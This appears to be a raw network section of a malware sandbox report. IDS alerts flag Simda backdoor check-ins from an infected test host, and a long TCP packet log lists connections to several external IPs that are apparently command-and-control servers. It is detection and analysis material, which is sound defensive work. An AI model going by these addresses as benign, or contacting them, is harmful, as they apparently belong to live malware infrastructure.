                                                                                                                                                                                                                  2024-11-11T18:51:34.292697+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.6592413.94.10.3480TCP
                                                                                                                                                                                                                  2024-11-11T18:51:34.334665+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659239188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:34.630829+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659236154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:35.819106+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65925091.195.240.1980TCP
                                                                                                                                                                                                                  2024-11-11T18:51:36.200017+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659240199.191.50.8380TCP

                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.946628094 CET4971480192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.951711893 CET804971418.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.952217102 CET4971480192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.961802959 CET4971580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.962400913 CET4971480192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.966742039 CET80497153.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.966919899 CET4971580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.967248917 CET804971418.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.969291925 CET4971580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.974136114 CET80497153.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.355417013 CET4971680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.360302925 CET8049716199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.360640049 CET4971680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.364603043 CET4971680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.369865894 CET8049716199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.382122040 CET804971418.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.382178068 CET4971480192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.387331009 CET4971480192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.388425112 CET804971418.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.388650894 CET4971480192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392153025 CET804971418.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.394115925 CET4971780192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.394520044 CET80497153.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.394575119 CET4971580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.396019936 CET4971580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.399049044 CET804971723.253.46.64192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.399151087 CET4971780192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.399502039 CET4971780192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.400851965 CET80497153.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.400923014 CET4971580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.400937080 CET80497153.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.404295921 CET804971723.253.46.64192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.409250975 CET4971880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.414427996 CET8049718188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.414513111 CET4971880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.415066004 CET4971880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.419989109 CET8049718188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.562731981 CET4971980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.567662001 CET804971944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.567749977 CET4971980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.571708918 CET4971980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.576531887 CET804971944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.608480930 CET4972080192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.613631010 CET804972044.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.613691092 CET4972080192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.613802910 CET4972180192.168.2.675.2.71.199
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.613887072 CET4972080192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.618683100 CET804972175.2.71.199192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.618729115 CET804972044.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.618746996 CET4972180192.168.2.675.2.71.199
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.623383999 CET4972180192.168.2.675.2.71.199
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.629040956 CET804972175.2.71.199192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.630753994 CET4972280192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.635766029 CET8049722208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.635840893 CET4972280192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.638107061 CET4972280192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.642959118 CET8049722208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.673557043 CET4972380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.678493977 CET8049723199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.678555965 CET4972380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.681142092 CET4972380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.685920000 CET8049723199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.853502035 CET804971723.253.46.64192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.853533983 CET804971723.253.46.64192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.853585958 CET4971780192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.853619099 CET4971780192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.855377913 CET4971780192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.855411053 CET4971780192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.860994101 CET4972480192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.865967035 CET804972423.253.46.64192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.866030931 CET4972480192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.866193056 CET4972480192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.871797085 CET804972423.253.46.64192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.897682905 CET4972580192.168.2.685.17.31.122
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.902648926 CET804972585.17.31.122192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.902766943 CET4972580192.168.2.685.17.31.122
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.902904034 CET4972580192.168.2.685.17.31.122
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.907768965 CET804972585.17.31.122192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.966859102 CET804972175.2.71.199192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.967186928 CET4972180192.168.2.675.2.71.199
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.967447996 CET4972180192.168.2.675.2.71.199
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.973691940 CET804972175.2.71.199192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.974704981 CET4972680192.168.2.675.2.71.199
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.980722904 CET804972675.2.71.199192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.981717110 CET4972680192.168.2.675.2.71.199
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.995461941 CET804971944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.995544910 CET4971980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.998550892 CET4972680192.168.2.675.2.71.199
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.003329992 CET804971944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.003454924 CET804972675.2.71.199192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.003482103 CET4971980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.047924995 CET804972044.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.049618006 CET4972080192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.056090117 CET804972044.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.057607889 CET4972080192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.129251003 CET8049722208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.129713058 CET4972280192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.131983995 CET8049718188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.132050037 CET4971880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.132131100 CET8049723199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.132180929 CET4972380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.132220984 CET8049723199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.132257938 CET4972380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.315776110 CET804972585.17.31.122192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.316634893 CET4972580192.168.2.685.17.31.122
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.330585957 CET804972675.2.71.199192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.332735062 CET4972680192.168.2.675.2.71.199
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.336357117 CET804972423.253.46.64192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.336369038 CET804972423.253.46.64192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.336474895 CET4972480192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.361938953 CET4972480192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.361942053 CET4972680192.168.2.675.2.71.199
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.363888025 CET4972080192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.368182898 CET804972675.2.71.199192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.368478060 CET804972423.253.46.64192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.368534088 CET4972480192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.368904114 CET804972044.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.564918041 CET4972580192.168.2.685.17.31.122
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.570235968 CET804972585.17.31.122192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.771218061 CET4971980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.777158022 CET804971944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.830197096 CET4972880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.834168911 CET4972980192.168.2.685.17.31.122
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.835139036 CET8049728154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.835225105 CET4972880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.835262060 CET4972280192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.835361958 CET4972880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.839065075 CET804972985.17.31.122192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.839159966 CET4972980192.168.2.685.17.31.122
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.839247942 CET4972980192.168.2.685.17.31.122
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.840169907 CET8049722208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.840209007 CET8049728154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.844043016 CET804972985.17.31.122192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.861464024 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.861496925 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.861555099 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.938725948 CET8049722208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.938801050 CET4972280192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.958868980 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.958885908 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.305301905 CET8049716199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.305366993 CET4971680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.392644882 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.392754078 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.453668118 CET804972985.17.31.122192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.453743935 CET4972980192.168.2.685.17.31.122
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.453808069 CET4972980192.168.2.685.17.31.122
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.456613064 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.456644058 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.457005978 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.457079887 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.459018946 CET804972985.17.31.122192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.461375952 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.507339954 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.689990997 CET4973180192.168.2.645.79.19.196
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.694920063 CET804973145.79.19.196192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.695063114 CET4973180192.168.2.645.79.19.196
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.695207119 CET4973180192.168.2.645.79.19.196
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.700103998 CET804973145.79.19.196192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.765034914 CET8049728154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.765094042 CET4972880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.777519941 CET4972880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.782932997 CET8049728154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.135122061 CET8049728154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.135318995 CET4972880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.178309917 CET804973145.79.19.196192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.178394079 CET4973180192.168.2.645.79.19.196
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.179297924 CET4973180192.168.2.645.79.19.196
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.180229902 CET4971680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.185226917 CET804973145.79.19.196192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.185277939 CET4973180192.168.2.645.79.19.196
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.185405970 CET8049716199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277348995 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277405024 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277437925 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277484894 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277507067 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277514935 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277520895 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277575016 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277580976 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277620077 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277652025 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277664900 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277671099 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277695894 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277718067 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277793884 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277842045 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277848005 CET44349730188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.277889967 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.278588057 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.278613091 CET49730443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.289357901 CET4971880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.294215918 CET8049718188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.640822887 CET8049718188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.640899897 CET4971880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.658545017 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.658585072 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.658895969 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.659233093 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.659249067 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.120570898 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.120656013 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.124924898 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.124943972 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.125514030 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.125742912 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.127337933 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.160233021 CET8049716199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.163788080 CET4971680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.171334028 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.587646008 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.592751026 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.593575954 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.616396904 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.621494055 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974329948 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974375963 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974412918 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974435091 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974453926 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974464893 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974473953 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974503994 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974503994 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974529982 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974545956 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974559069 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974598885 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974603891 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974783897 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974795103 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974802017 CET44349732188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974839926 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.974839926 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.975007057 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.975007057 CET49732443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234577894 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234608889 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234620094 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234632015 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234662056 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234669924 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234714031 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234896898 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234919071 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234930038 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234941006 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234945059 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234956980 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234986067 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.235142946 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.235155106 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.235191107 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.235203981 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.239533901 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.239588976 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.239593029 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.239633083 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323055029 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323082924 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323093891 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323175907 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323175907 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323189020 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323200941 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323259115 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323348999 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323405027 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323420048 CET804973364.190.63.136192.168.2.6
